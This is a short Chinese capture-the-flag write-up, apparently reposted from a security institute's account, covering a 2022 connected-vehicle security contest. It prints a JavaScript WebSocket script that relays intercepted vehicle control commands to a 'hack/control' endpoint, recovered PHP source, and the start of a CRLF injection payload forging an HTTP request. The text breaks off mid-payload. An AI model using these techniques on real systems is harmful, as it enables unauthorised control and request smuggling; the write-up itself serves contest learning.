山石网科安全技术研究院简称“山石安研院”正式成立于2020年4月,是山石网科的信息安全智库部门,山石安研院旗下包括干将、莫邪两大安全实验室,以及安全预警分析、高端攻防培训两支独立的技术团队。
今天看啥  ›  专栏  ›  山石网科安全技术研究院

数字中国创新大赛车联网安全赛WriteUp

山石网科安全技术研究院  · 公众号  ·  · 2022-04-12 08:49
1. Webbest_agent这个页面的操作会把车辆操作的命令发送的/test/log写个脚本不断获取到指令并且发送到hack/controltype="text/javascript">varws1,ws2;ws2=newWebSocket("ws://47.93.2.254:36077/test/log");ws1=newWebSocket("ws://47.93.2.254:36077/hack/control");ws1.onopen=function(){ws2.onmessage=function (event){console.log(event['data']);ws1.send(event['data']);ws1.send(event['data'].replace("\n", ""));};}ws1.onmessage=function(e){console.log(e);} 根据提示跑完全程,提示一个HTTP代理一开始就怀疑CRLF注入后面提示了,正好直接打了,扫目录出来一个git,还原得到源码:php$input=file_get_contents("php://input");$obj=json_decode($input);if ($obj->get_flag_is_a_beautiful_thing=="yes") {   $FLAG=file_get_contents("/flag");   file_put_contents('flag', $FLAG);} 根据题目提示直接构造CRLF注入,构造脚本如下:php$payload=urlencode("open.php HTTP/1.1\r\nHost: 127.0.0.1:8000\r\nContent-Length: 41\r\n ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照